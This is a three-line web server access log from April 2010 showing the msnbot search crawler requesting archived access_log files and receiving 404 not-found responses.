207.46.195.235 - - [16/Apr/2010:06:07:30 -0500] "GET /logs/access_log.1206576000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.140 - - [16/Apr/2010:06:09:59 -0500] "GET /logs/access_log.1240531200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.132 - - [16/Apr/2010:06:10:01 -0500] "GET /logs/access_log.1235692800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
